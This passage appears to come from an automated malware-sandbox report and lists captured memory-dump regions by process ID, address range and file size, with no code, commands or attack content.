                                                                                                                                                                                                                                                                          • memory/1308-188-0x000000001B440000-0x000000001B442000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1308-169-0x0000000000680000-0x0000000000681000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1308-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1308-357-0x00000000024A0000-0x00000000024A1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1308-358-0x00000000024A2000-0x00000000024A3000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1308-360-0x00000000024A3000-0x00000000024A4000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1308-174-0x0000000000CB0000-0x0000000000CCF000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            124KB

                                                                                                                                                                                                                                                                          • memory/1308-176-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1308-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1308-171-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1328-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1384-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1408-247-0x0000021311640000-0x00000213116B1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/1536-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1648-339-0x00000000053A0000-0x00000000059A6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                          • memory/1648-338-0x0000000000417E8A-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1784-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/1912-260-0x000001DBA8F60000-0x000001DBA8FD1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/2112-289-0x0000000002610000-0x00000000026AD000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            628KB

                                                                                                                                                                                                                                                                          • memory/2112-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/2112-290-0x0000000000400000-0x0000000000949000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                                                                          • memory/2128-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/2180-298-0x0000000001170000-0x0000000001186000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                                                          • memory/2356-292-0x0000000000400000-0x00000000008F4000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                                                          • memory/2356-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/2356-291-0x0000000000A50000-0x0000000000A59000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                                          • memory/2460-214-0x000001EF8EE40000-0x000001EF8EEB1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/2484-205-0x00000205B8E60000-0x00000205B8ED1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/2544-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/2600-163-0x0000000000E60000-0x0000000000E61000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/2600-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/2676-268-0x000001A365B00000-0x000001A365B71000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/2684-279-0x000001BF16CD0000-0x000001BF16D41000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/2892-227-0x0000012848440000-0x00000128484B1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            452KB

                                                                                                                                                                                                                                                                          • memory/3244-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3276-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3276-329-0x00000000057D0000-0x00000000057D1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3276-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3420-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3448-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3452-250-0x0000000002810000-0x0000000002811000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3452-237-0x00000000006A0000-0x00000000006A1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3452-276-0x0000000000C90000-0x0000000000CC1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            196KB

                                                                                                                                                                                                                                                                          • memory/3452-257-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3452-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3548-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3628-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3628-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3652-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                                          • memory/3652-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                          • memory/3652-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3652-161-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/3652-134-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.1MB

                                                                                                                                                                                                                                                                          • memory/3652-152-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/3652-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            152KB

                                                                                                                                                                                                                                                                          • memory/3652-154-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/3652-159-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                                          • memory/3772-212-0x0000000004F30000-0x0000000004F31000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3772-195-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                                          • memory/3772-197-0x0000000000417F26-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/3772-213-0x0000000002830000-0x0000000002831000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3772-216-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3772-225-0x0000000004E20000-0x0000000004E21000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3772-211-0x0000000005550000-0x0000000005551000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3772-252-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4116-259-0x00000000007D0000-0x00000000007D1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4116-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4116-267-0x000000000A540000-0x000000000A541000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4116-274-0x0000000002390000-0x0000000002391000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4116-246-0x0000000000200000-0x0000000000201000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4116-265-0x00000000007F0000-0x00000000007FE000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                                                                          • memory/4116-269-0x000000000A040000-0x000000000A041000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4188-277-0x0000000001010000-0x0000000001011000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4188-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4188-275-0x0000000000FD0000-0x0000000001008000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            224KB

                                                                                                                                                                                                                                                                          • memory/4188-263-0x0000000001090000-0x0000000001091000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4188-249-0x0000000000830000-0x0000000000831000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4188-280-0x0000000005480000-0x0000000005481000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4196-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4212-368-0x0000000000417E82-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4256-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4288-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4292-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4332-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4388-344-0x0000000077BB0000-0x0000000077D3E000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/4388-346-0x0000000005300000-0x0000000005301000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4388-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4392-332-0x00000000056D0000-0x00000000056D1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4392-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4396-359-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4412-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4432-334-0x0000000004FD0000-0x0000000004FD1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4432-333-0x0000000077BB0000-0x0000000077D3E000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                          • memory/4432-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4452-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4452-331-0x00000000056E0000-0x00000000056E1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4460-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4500-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4556-284-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4556-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4576-356-0x00000000004B0000-0x00000000004BC000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                          • memory/4576-320-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4648-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4652-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4672-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4768-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4780-340-0x0000000000417E8E-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4780-341-0x0000000005150000-0x0000000005756000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                          • memory/4816-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4924-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4932-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4956-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/4992-337-0x0000000004C50000-0x0000000005256000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                          • memory/4992-336-0x0000000000417E9E-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5008-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5020-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5028-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5072-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5104-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5108-347-0x0000000006B50000-0x0000000006B51000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/5108-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5108-348-0x0000000006B52000-0x0000000006B53000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB